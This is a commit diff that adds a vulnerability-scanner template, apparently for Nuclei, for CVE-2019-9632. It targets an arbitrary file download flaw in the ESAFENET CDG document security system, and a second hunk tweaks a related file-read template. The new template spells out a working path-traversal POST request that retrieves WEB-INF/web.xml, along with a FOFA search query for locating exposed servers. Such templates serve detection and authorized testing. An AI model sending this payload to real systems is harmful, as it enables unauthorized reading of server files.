Added CVE-2019-9632

http/cves/2019/CVE-2019-9632.yaml

@@ -0,0 +1,44 @@
+id: CVE-2019-9632
+
+info:
+  name: ESAFENET CDG - Arbitrary File Download
+  author: pdteam
+  severity: high
+  description: |
+    ESAFENET CDG V3 and V5 has an arbitrary file download vulnerability via the fileName parameter in download.jsp because the InstallationPack parameter is mishandled in a /CDGServer3/ClientAjax request.
+  reference:
+    - https://github.com/HimmelAward/Goby_POC
+    - https://github.com/Z0fhack/Goby_POC
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2019-9632
+    cpe: cpe:2.3:a:esafenet:electronic_document_security_management_system:v3:*:*:*:*:*:*:*
+    epss-score: 0.00183
+    epss-percentile: 0.54622
+  metadata:
+    product: electronic_document_security_management_system
+    vendor: esafenet
+    fofa-query: title="电子文档安全管理系统"
+  tags: cve,cve2019,esafenet,lfi
+
+http:
+  - method: POST
+    path:
+      - "{{BaseURL}}/CDGServer3/ClientAjax"
+
+    headers:
+      Content-Type: application/x-www-form-urlencoded
+
+    body: |
+      command=downclientpak&InstallationPack=../WEB-INF/web.xml&forward=index.jsp
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - "<servlet-name>CDGPermissions</servlet-name>"

http/vulnerabilities/esafenet/esafenet-mysql-fileread.yaml

@@ -17,6 +17,7 @@ http:
     path:
       - "{{BaseURL}}/CDGServer3/SQL/MYSQL/create_SmartSec_mysql.sql"
 
+    max-size: 1000
     matchers-condition: and
     matchers:
       - type: word